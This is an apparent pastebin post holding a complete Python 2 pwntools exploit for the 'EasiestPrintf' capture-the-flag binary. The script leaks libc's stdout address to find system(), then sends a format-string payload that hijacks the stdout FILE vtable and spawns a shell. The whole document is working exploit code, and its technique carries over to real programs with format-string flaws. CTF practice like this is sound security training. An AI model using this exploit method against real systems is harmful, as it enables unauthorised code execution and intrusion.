
EasiestPrintf

phieulang1993, Aug 13th, 2017
```python
# Python 2 pwntools script for the "EasiestPrintf" challenge.
from pwn import *
context(arch = 'i386', os = 'linux')

libc = ELF('libc.so.6')          # target libc, used for symbol offsets
BINARY = "EasiestPrintf"
r = process(BINARY)
print "attach %d" % r.pid        # pid is printed so a debugger can be attached

STDOUT = 0x0804A044              # address of the binary's `stdout` pointer

def hackIt():
    # Stage 1: the program offers an arbitrary read; use it to leak the
    # address of _IO_2_1_stdout_ inside libc and derive the libc base.
    r.recvuntil("Which address you wanna read:\n")
    r.sendline(str(STDOUT))
    _IO_2_1_stdout_ = int(r.recv(10), 16)      # reply is a 10-char hex string, "0x........"
    _IO_file_jumps = _IO_2_1_stdout_ + 0x94     # vtable pointer field of the stdout FILE
    libc_base = _IO_2_1_stdout_ - libc.symbols['_IO_2_1_stdout_']
    system = libc_base + libc.symbols['system']
    log.info('_IO_2_1_stdout_: %#x' % _IO_2_1_stdout_)
    log.info('_IO_file_jumps: %#x' % _IO_file_jumps)
    log.info('libc_base: %#x' % libc_base)
    log.info('system: %#x' % system)
    r.recvuntil("Good Bye\n")
    offset_buf = 7                               # stack position of the buffer for printf
    new_IO_file_jumps = _IO_2_1_stdout_ + 0x150  # fake vtable placed just past the FILE

    # Stage 2: format-string write. Redirect the FILE's vtable pointer to the
    # fake table, store system() in that table's slot at +0x1c, and write "sh"
    # over the start of the FILE struct so it becomes the argument.
    payload = fmtstr_payload(offset_buf, {
        _IO_file_jumps: new_IO_file_jumps,
        new_IO_file_jumps + 0x1c: system,
        _IO_2_1_stdout_: u32("sh\x00\x00"),
    }, write_size="short")
    raw_input("debug?")
    r.sendline(payload)
    r.interactive()

hackIt()
```